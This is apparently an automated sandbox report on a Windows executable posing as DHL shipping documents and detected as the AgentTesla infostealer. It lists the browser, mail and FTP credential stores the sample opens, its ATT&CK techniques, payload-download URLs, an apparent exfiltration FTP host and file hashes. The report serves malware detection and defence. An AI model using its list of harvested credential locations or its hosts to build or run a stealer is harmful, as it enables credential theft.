                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.iniJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.iniJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                    Tries to harvest and steal ftp login credentials
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\FTP Navigator\Ftplist.txtJump to behavior
                    Tries to steal Mail credentials (via file / registry access)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                    Source: Yara matchFile source: 1.2.DHL Shipping Documents 0016229753_PDF.exe.32b7d70.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.DHL Shipping Documents 0016229753_PDF.exe.13323f68.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.DHL Shipping Documents 0016229753_PDF.exe.328f708.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.DHL Shipping Documents 0016229753_PDF.exe.3293538.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.DHL Shipping Documents 0016229753_PDF.exe.32b7d70.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.DHL Shipping Documents 0016229753_PDF.exe.13323f68.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000001.00000002.1416664051.0000000003281000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.2591102452.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.2592099804.0000000002CE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.1416790317.00000000132E9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: DHL Shipping Documents 0016229753_PDF.exe PID: 5836, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 5764, type: MEMORYSTR

                    Remote Access Functionality

                    barindex
                    Yara detected AgentTesla
                    Source: Yara matchFile source: dump.pcap, type: PCAP
                    Source: Yara matchFile source: 1.2.DHL Shipping Documents 0016229753_PDF.exe.32b7d70.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.DHL Shipping Documents 0016229753_PDF.exe.13323f68.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.DHL Shipping Documents 0016229753_PDF.exe.328f708.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.DHL Shipping Documents 0016229753_PDF.exe.3293538.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.DHL Shipping Documents 0016229753_PDF.exe.32b7d70.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.DHL Shipping Documents 0016229753_PDF.exe.13323f68.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000003.00000002.2592099804.0000000002D2E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.1416664051.0000000003281000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.2591102452.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.2592099804.0000000002CE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.1416790317.00000000132E9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: DHL Shipping Documents 0016229753_PDF.exe PID: 5836, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 5764, type: MEMORYSTR

                    Mitre Att&ck Matrix

                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity InformationAcquire InfrastructureValid Accounts121
                    Windows Management Instrumentation                    		1
                    DLL Side-Loading                    		1
                    DLL Side-Loading                    		1
                    Disable or Modify Tools                    		2
                    OS Credential Dumping                    		1
                    File and Directory Discovery                    		Remote Services11
                    Archive Collected Data                    		2
                    Ingress Tool Transfer                    		1
                    Exfiltration Over Alternative Protocol                    		Abuse Accessibility Features
                    CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts311
                    Process Injection                    		1
                    Deobfuscate/Decode Files or Information                    		1
                    Input Capture                    		24
                    System Information Discovery                    		Remote Desktop Protocol2
                    Data from Local System                    		11
                    Encrypted Channel                    		Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
                    Obfuscated Files or Information                    		1
                    Credentials in Registry                    		111
                    Security Software Discovery                    		SMB/Windows Admin Shares1
                    Email Collection                    		1
                    Non-Standard Port                    		Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                    Software Packing                    		NTDS1
                    Process Discovery                    		Distributed Component Object Model1
                    Input Capture                    		2
                    Non-Application Layer Protocol                    		Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                    DLL Side-Loading                    		LSA Secrets141
                    Virtualization/Sandbox Evasion                    		SSHKeylogging23
                    Application Layer Protocol                    		Scheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                    Masquerading                    		Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items141
                    Virtualization/Sandbox Evasion                    		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job311
                    Process Injection                    		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    SourceDetectionScannerLabelLink
                    DHL Shipping Documents 0016229753_PDF.exe47%ReversingLabsByteCode-MSIL.Trojan.Remcos
                    DHL Shipping Documents 0016229753_PDF.exe100%AviraHEUR/AGEN.1314412

                    Dropped Files

                    No Antivirus matches

                    Unpacked PE Files

                    No Antivirus matches

                    Domains

                    No Antivirus matches

                    URLs

                    SourceDetectionScannerLabelLink
                    https://account.dyn.com/0%URL Reputationsafe
                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                    https://investdirectinsurance.com/O~0%Avira URL Cloudsafe
                    https://investdirectinsurance.com/0%Avira URL Cloudsafe
                    https://api.yookassa.ru/v3/0%Avira URL Cloudsafe
                    https://investdirectinsurance.com/assuence/litesolidCha/Pano.blsC:0%Avira URL Cloudsafe
                    https://investdirectinsurance.com/assuence/litesolidCha/Mindwall.bl(t0%Avira URL Cloudsafe
                    https://investdirectinsurance.com/assuence/litesolidCha/Pano.bl&0%Avira URL Cloudsafe
                    http://ftp.wapination.net0%Avira URL Cloudsafe
                    https://investdirectinsurance.com/assuence/litesolidCha/Pano.bl0%Avira URL Cloudsafe
                    https://investdirectinsurance.com/assuence/litesolidCha/Pano.blx0%Avira URL Cloudsafe
                    https://investdirectinsurance.com/assuence/litesolidCha/Mindwall.bl~t0%Avira URL Cloudsafe
                    https://investdirectinsurance.com/J~%0%Avira URL Cloudsafe
                    https://investdirectinsurance.com/assuence/litesolidCha/Mindwall.bl0%Avira URL Cloudsafe
                    https://investdirectinsurance.com/assuence/litesolidCha/Mindwall.blwt0%Avira URL Cloudsafe
                    http://wapination.net0%Avira URL Cloudsafe

                    Domains and IPs

                    Contacted Domains

                    NameIPActiveMaliciousAntivirus DetectionReputation
                    wapination.net
                    		108.179.234.136
                    		truetrue
                      		unknown
                      investdirectinsurance.com
                      		172.67.189.102
                      		truefalse
                        		unknown
                        fp2e7a.wpc.phicdn.net
                        		192.229.221.95
                        		truefalse
                          		unknown
                          ftp.wapination.net
                          		unknown
                          		unknowntrue
                            		unknown

                            Contacted URLs

                            NameMaliciousAntivirus DetectionReputation
                            https://investdirectinsurance.com/assuence/litesolidCha/Pano.blfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://investdirectinsurance.com/assuence/litesolidCha/Mindwall.blfalse
                            • Avira URL Cloud: safe
                            		unknown

                            URLs from Memory and Binaries

                            NameSourceMaliciousAntivirus DetectionReputation
                            https://investdirectinsurance.com/assuence/litesolidCha/Pano.blxDHL Shipping Documents 0016229753_PDF.exe, 00000001.00000002.1417803122.000000001C279000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://ftp.wapination.netMSBuild.exe, 00000003.00000002.2592099804.0000000002D2E000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2592099804.0000000002D3C000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://account.dyn.com/DHL Shipping Documents 0016229753_PDF.exe, 00000001.00000002.1416790317.00000000132E9000.00000004.00000800.00020000.00000000.sdmp, DHL Shipping Documents 0016229753_PDF.exe, 00000001.00000002.1416664051.0000000003281000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2591102452.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            https://investdirectinsurance.com/assuence/litesolidCha/Pano.bl&DHL Shipping Documents 0016229753_PDF.exe, 00000001.00000002.1417803122.000000001C279000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://api.yookassa.ru/v3/DHL Shipping Documents 0016229753_PDF.exefalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://investdirectinsurance.com/O~DHL Shipping Documents 0016229753_PDF.exe, 00000001.00000002.1415854239.00000000015C6000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://investdirectinsurance.com/assuence/litesolidCha/Mindwall.bl(tDHL Shipping Documents 0016229753_PDF.exe, 00000001.00000002.1415854239.00000000015C6000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://investdirectinsurance.com/assuence/litesolidCha/Pano.blsC:DHL Shipping Documents 0016229753_PDF.exefalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://investdirectinsurance.com/assuence/litesolidCha/Mindwall.bl~tDHL Shipping Documents 0016229753_PDF.exe, 00000001.00000002.1415854239.00000000015C6000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://investdirectinsurance.com/DHL Shipping Documents 0016229753_PDF.exe, 00000001.00000002.1417803122.000000001C279000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://investdirectinsurance.com/J~%DHL Shipping Documents 0016229753_PDF.exe, 00000001.00000002.1415854239.00000000015C6000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameMSBuild.exe, 00000003.00000002.2592099804.0000000002D2E000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://wapination.netMSBuild.exe, 00000003.00000002.2592099804.0000000002D3C000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://investdirectinsurance.com/assuence/litesolidCha/Mindwall.blwtDHL Shipping Documents 0016229753_PDF.exe, 00000001.00000002.1415854239.00000000015C6000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown

                            World Map of Contacted IPs

                            • No. of IPs < 25%
                            • 25% < No. of IPs < 50%
                            • 50% < No. of IPs < 75%
                            • 75% < No. of IPs

                            Public IPs

                            IPDomainCountryFlagASNASN NameMalicious
                            108.179.234.136
                            		wapination.netUnited States
                            		46606UNIFIEDLAYER-AS-1UStrue
                            172.67.189.102
                            		investdirectinsurance.comUnited States
                            		13335CLOUDFLARENETUSfalse

                            General Information

                            Joe Sandbox version:40.0.0 Tourmaline
                            Analysis ID:1486782
                            Start date and time:2024-08-02 15:01:04 +02:00
                            Joe Sandbox product:CloudBasic
                            Overall analysis duration:0h 5m 44s
                            Hypervisor based Inspection enabled:false
                            Report type:full
                            Cookbook file name:default.jbs
                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                            Number of analysed new started processes analysed:11
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:0
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Sample name:DHL Shipping Documents 0016229753_PDF.exe
                            Detection:MAL
                            Classification:mal100.troj.spyw.evad.winEXE@3/3@2/2
                            EGA Information:
                            • Successful, ratio: 100%
                            HCA Information:
                            • Successful, ratio: 99%
                            • Number of executed functions: 58
                            • Number of non-executed functions: 4
                            Cookbook Comments:
                            • Found application associated with file extension: .exe

                            Warnings

                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                            • Excluded IPs from analysis (whitelisted): 40.68.123.157, 192.229.221.95, 13.85.23.206, 72.247.153.162, 72.247.153.178
                            • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, ctldl.windowsupdate.com, a767.dspw65.akamai.net, fe3cr.delivery.mp.microsoft.com, download.windowsupdate.com.edgesuite.net, fe3.delivery.mp.microsoft.com, ocsp.digicert.com, ocsp.edge.digicert.com, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, wu-b-net.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net
                            • Not all processes where analyzed, report is missing behavior information
                            • Report size getting too big, too many NtOpenKeyEx calls found.
                            • Report size getting too big, too many NtQueryValueKey calls found.
                            • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                            • VT rate limit hit for: DHL Shipping Documents 0016229753_PDF.exe

                            Simulations

                            Behavior and APIs

                            No simulations

                            Joe Sandbox View / Context

                            IPs

                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            108.179.234.13695cc26903867ce68cb392ca3fe5ad21e371b8b6b2f1540137d0c6d26e9ca69c7_dump.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                              Shipping Documents_pdf.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeGet hashmaliciousAgentTeslaBrowse
                                  SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeGet hashmaliciousAgentTeslaBrowse
                                    Shipping Documents_pdf.scr.exeGet hashmaliciousAgentTeslaBrowse
                                      Quotation_#432768#_pdf.scr.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                        Payment Advice Copy-EUR 5500,00 20240419165413-docx.pif.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                          Payment_Advice-pdf.exeGet hashmaliciousAgentTesla, PureLog Stealer, RedLineBrowse
                                            172.67.189.102New _Order_0567___Pdf.exeGet hashmaliciousUnknownBrowse
                                              d34e1p5zD2.exeGet hashmaliciousUnknownBrowse
                                                9B1ZyhsFUq.exeGet hashmaliciousFormBookBrowse
                                                  R86BRY7DdC.exeGet hashmaliciousSnake KeyloggerBrowse
                                                    d34e1p5zD2.exeGet hashmaliciousUnknownBrowse
                                                      41DLTjkmOm.exeGet hashmaliciousRemcosBrowse

                                                        Domains

                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        investdirectinsurance.comGeron Steel-Order-79376- Contract 2025.exeGet hashmaliciousRemcosBrowse
                                                        • 104.21.65.79
                                                        New _Order_0567___Pdf.exeGet hashmaliciousUnknownBrowse
                                                        • 172.67.189.102
                                                        d34e1p5zD2.exeGet hashmaliciousUnknownBrowse
                                                        • 172.67.189.102
                                                        Mu7iyblZk8.exeGet hashmaliciousUnknownBrowse
                                                        • 104.21.65.79
                                                        9B1ZyhsFUq.exeGet hashmaliciousFormBookBrowse
                                                        • 172.67.189.102
                                                        Ycj3d5NMhc.exeGet hashmaliciousUnknownBrowse
                                                        • 104.21.65.79
                                                        R86BRY7DdC.exeGet hashmaliciousSnake KeyloggerBrowse
                                                        • 172.67.189.102
                                                        d34e1p5zD2.exeGet hashmaliciousUnknownBrowse
                                                        • 172.67.189.102
                                                        41DLTjkmOm.exeGet hashmaliciousRemcosBrowse
                                                        • 172.67.189.102
                                                        Ycj3d5NMhc.exeGet hashmaliciousUnknownBrowse
                                                        • 104.21.65.79
                                                        fp2e7a.wpc.phicdn.netInvoice GRAFO GROUP MQ 26.07.2024.vbsGet hashmaliciousUnknownBrowse
                                                        • 192.229.221.95
                                                        https://www.helpministries.ch/2024/08/01/lido-pnto/JEB187438MI50OD11.htmlGet hashmaliciousUnknownBrowse
                                                        • 192.229.221.95
                                                        https://aka.ms/protectedmessage.Get hashmaliciousUnknownBrowse
                                                        • 192.229.221.95
                                                        9rybs.msiGet hashmaliciousUnknownBrowse
                                                        • 192.229.221.95
                                                        https://pakbutton.com.pk/mailbox/upgrade/25GB/clientGet hashmaliciousUnknownBrowse
                                                        • 192.229.221.95
                                                        https://kplparis.freshdesk.com/en/support/solutions/articles/154000170570-facture-n-%C2%BA-fc-2024-013Get hashmaliciousUnknownBrowse
                                                        • 192.229.221.95
                                                        https://pakbutton.com.pkGet hashmaliciousUnknownBrowse
                                                        • 192.229.221.95
                                                        https://pub-fc3b3bfaa8f54a1b8d8485fe0bfe792b.r2.dev/HK.html#christa.claes@daiichi-sankyo.deGet hashmaliciousHTMLPhisherBrowse
                                                        • 192.229.221.95
                                                        https://www.bing.com/ck/a?!&&p=7522cfa299d94e97JmltdHM9MTcyMjQ3MDQwMCZpZ3VpZD0wZjk2ODVjNi05NDg0LTY3YzQtMGM5MS05MTBlOTU3NjY2YzkmaW5zaWQ9NTEzMA&ptn=3&ver=2&hsh=3&fclid=0f9685c6-9484-67c4-0c91-910e957666c9&u=a1aHR0cHM6Ly93d3cuaG4taG5wcmludGVyLmNvbS9pbnRlcm5hdGlvbmFsLWNsaWVudHMv&Get hashmaliciousHTMLPhisherBrowse
                                                        • 192.229.221.95
                                                        https://markeertrafficservicebv6t3etwyghdsbn.dorik.io/Get hashmaliciousUnknownBrowse
                                                        • 192.229.221.95

                                                        ASNs

                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        UNIFIEDLAYER-AS-1USQUOTATION_AUGQTRA071244#U00b7PDF.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                        • 198.57.247.184
                                                        FfRBfYqF5b.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                        • 162.241.217.213
                                                        qOx3o5Y9mu.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                        • 162.241.217.213
                                                        6ddrUd6iQo.exeGet hashmaliciousFormBookBrowse
                                                        • 162.241.148.243
                                                        https://hij.koc.mybluehost.me/Z/Get hashmaliciousUnknownBrowse
                                                        • 162.241.217.57
                                                        https://zjnlm.vk.com////away.php?to=https://brandequity.economictimes.indiatimes.com/etl.php?url=radiouserdadambato.com/dayo/vwxmp/c2N1bWluZ3NAdG1oY2MuY29tGet hashmaliciousHTMLPhisherBrowse
                                                        • 192.185.187.154
                                                        http://www.craft.com.brGet hashmaliciousUnknownBrowse
                                                        • 162.241.62.70
                                                        http://www.coinbase-user-vlogin.tradewindpropertiescr.com/Get hashmaliciousUnknownBrowse
                                                        • 192.185.198.44
                                                        https://nym1-ib.adnxs.com/click2?e=wqT_3QKZAfBDmQAAAAMAxBkFAQiIoM-zBhCJo_aKxfvCoioYgeDOtoOlx-YOIIy_9g4omAIwuGg4kQRAuq2d7gFI8opOUABaA1VTRGIBBYhoAXABeJmgZ4ABAIgBAZABApgBBaABAqkBNzgR_dr64z-xAREKLLkBAAAAQDMz_z_BAREUAMkVChzYAY69AuABAA../s=fd215fa3f6c45164ae9790e4c04714dce2356091/bcr=AAAAAAAA8D8=/pp=0.62/bn=0/clickenc=//lilypet.com.br/rarr/jhfhnfknf/aWFuLnJvZ2Vyc0BsbWcubmV0Get hashmaliciousEvilProxyBrowse
                                                        • 192.185.218.163
                                                        phish_alert_sp2_2.0.0.0 (36).emlGet hashmaliciousHTMLPhisherBrowse
                                                        • 192.185.24.172
                                                        CLOUDFLARENETUSDHL 82249910 PDF.exeGet hashmaliciousAgentTeslaBrowse
                                                        • 104.26.12.205
                                                        Invoice GRAFO GROUP MQ 26.07.2024.vbsGet hashmaliciousUnknownBrowse
                                                        • 188.114.97.3
                                                        https://its.imagesrs.com/capstonelogistics.com/&adfs/ls/client-request-id=7c724&wa=wsignin10.htmlGet hashmaliciousUnknownBrowse
                                                        • 1.1.1.1
                                                        https://www.helpministries.ch/2024/08/01/lido-pnto/JEB187438MI50OD11.htmlGet hashmaliciousUnknownBrowse
                                                        • 104.22.51.98
                                                        QUOTATION_AUGQTRA071244#U00b7PDF.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                        • 188.114.96.3
                                                        WcBQ1Er7ys.exeGet hashmaliciousDCRatBrowse
                                                        • 104.20.3.235
                                                        FfRBfYqF5b.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                        • 188.114.97.3
                                                        qOx3o5Y9mu.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                        • 188.114.97.3
                                                        3wga04wZcP.exeGet hashmaliciousMofongoLoaderBrowse
                                                        • 188.114.97.3
                                                        hI1ho6jgmf.exeGet hashmaliciousAgentTeslaBrowse
                                                        • 104.26.13.205

                                                        JA3 Fingerprints

                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        1138de370e523e824bbca92d049a3777The Situ Group Ltd.pdfGet hashmaliciousHTMLPhisherBrowse
                                                        • 23.206.229.209
                                                        https://www.ajnr.org/highwire_log/share/reddit?link=https://brandequity.economictimes.indiatimes.com.////etl.php?url=deffarma.com.br/dayo/3hlqt/SEwtUG9ydC1Mb2dpc3RpY3NAY2R3ZS5jb20udHc=$%C3%A3%E2%82%AC%E2%80%9AGet hashmaliciousHTMLPhisherBrowse
                                                        • 23.206.229.209
                                                        https://pub-fc3b3bfaa8f54a1b8d8485fe0bfe792b.r2.dev/HK.html#christa.claes@daiichi-sankyo.deGet hashmaliciousHTMLPhisherBrowse
                                                        • 23.206.229.209
                                                        https://markeertrafficservicebv6t3etwyghdsbn.dorik.io/Get hashmaliciousUnknownBrowse
                                                        • 23.206.229.209
                                                        https://forms.office.com/e/0Z5hR0x9HMGet hashmaliciousUnknownBrowse
                                                        • 23.206.229.209
                                                        Arts_ Fax MSG2 FAX825534.htmlGet hashmaliciousUnknownBrowse
                                                        • 23.206.229.209
                                                        http://www.craft.com.brGet hashmaliciousUnknownBrowse
                                                        • 23.206.229.209
                                                        http://www.coinbase-user-vlogin.tradewindpropertiescr.com/Get hashmaliciousUnknownBrowse
                                                        • 23.206.229.209
                                                        http://project-may1.pages.dev/Get hashmaliciousTechSupportScamBrowse
                                                        • 23.206.229.209
                                                        http://metaxask-slogin.gitbook.io/Get hashmaliciousUnknownBrowse
                                                        • 23.206.229.209
                                                        37f463bf4616ecd445d4a1937da06e193wga04wZcP.exeGet hashmaliciousMofongoLoaderBrowse
                                                        • 172.67.189.102
                                                        uMGZmwaXI2.exeGet hashmaliciousBlackMoonBrowse
                                                        • 172.67.189.102
                                                        198-211-108-149-32.exeGet hashmaliciousCobaltStrike, ReflectiveLoaderBrowse
                                                        • 172.67.189.102
                                                        p2StQYQ4ck.exeGet hashmaliciousVidarBrowse
                                                        • 172.67.189.102
                                                        Tweak.regGet hashmaliciousLummaCBrowse
                                                        • 172.67.189.102
                                                        Hv9RA2o5Sg.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                        • 172.67.189.102
                                                        ucb3ojb4XB.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                        • 172.67.189.102
                                                        jC5DorvENv.exeGet hashmaliciousGuLoader, LokibotBrowse
                                                        • 172.67.189.102
                                                        Setup_BOC.5.exeGet hashmaliciousUnknownBrowse
                                                        • 172.67.189.102
                                                        setup_2024#U5e74_7#U6708_26#U65e5.exeGet hashmaliciousUnknownBrowse
                                                        • 172.67.189.102

                                                        Dropped Files

                                                        No context

                                                        Created / dropped Files

                                                        C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\DHL Shipping Documents 0016229753_PDF.exe.log

                                                        Download File
                                                        Process:C:\Users\user\Desktop\DHL Shipping Documents 0016229753_PDF.exe
                                                        File Type:CSV text
                                                        Category:dropped
                                                        Size (bytes):425
                                                        Entropy (8bit):5.357964438493834
                                                        Encrypted:false
                                                        SSDEEP:12:Q3La/KDLI4MWuPXcp1OKbbDLI4MWuPOKfSSI6Khav:ML9E4KQwKDE4KGKZI6Khk
                                                        MD5:D8F8A79B5C09FCB6F44E8CFFF11BF7CA
                                                        SHA1:669AFE705130C81BFEFECD7CC216E6E10E72CB81
                                                        SHA-256:91B010B5C9F022F3449F161425F757B276021F63B024E8D8ED05476509A6D406
                                                        SHA-512:C95CB5FC32843F555EFA7CCA5758B115ACFA365A6EEB3333633A61CA50A90FEFAB9B554C3776FFFEA860FEF4BF47A6103AFECF3654C780287158E2DBB8137767
                                                        Malicious:true
                                                        Reputation:moderate, very likely benign file
                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..

                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\Pano[1].bl

                                                        Download File
                                                        Process:C:\Users\user\Desktop\DHL Shipping Documents 0016229753_PDF.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):238592
                                                        Entropy (8bit):7.199093704147107
                                                        Encrypted:false
                                                        SSDEEP:6144:t+dqwNvo2UsXcshR7X3PBjEv3/JCvPNvFcK4Lin832cjifvblc3I:t4v3BjEf8vPvct9jOblCI
                                                        MD5:B093592D080675B700E02EAE9A3D6873
                                                        SHA1:565F9E7B6775DDF96B3F2FE3D1ACB0FD2108D27B
                                                        SHA-256:93DA09F48FA60535DBDD8EE6183DFCED516D90599F00FCF1F83ECFF76C1BF9B0
                                                        SHA-512:69376AA69EBE174BE781923A8E923BC7E32367CD344B1AB8A01411EC9F9FFE14BC332C04A77C07057B38ED7323A45BD8DD89B5CE1FEC4CC656115BCB1533A27E
                                                        Malicious:false
                                                        Reputation:low
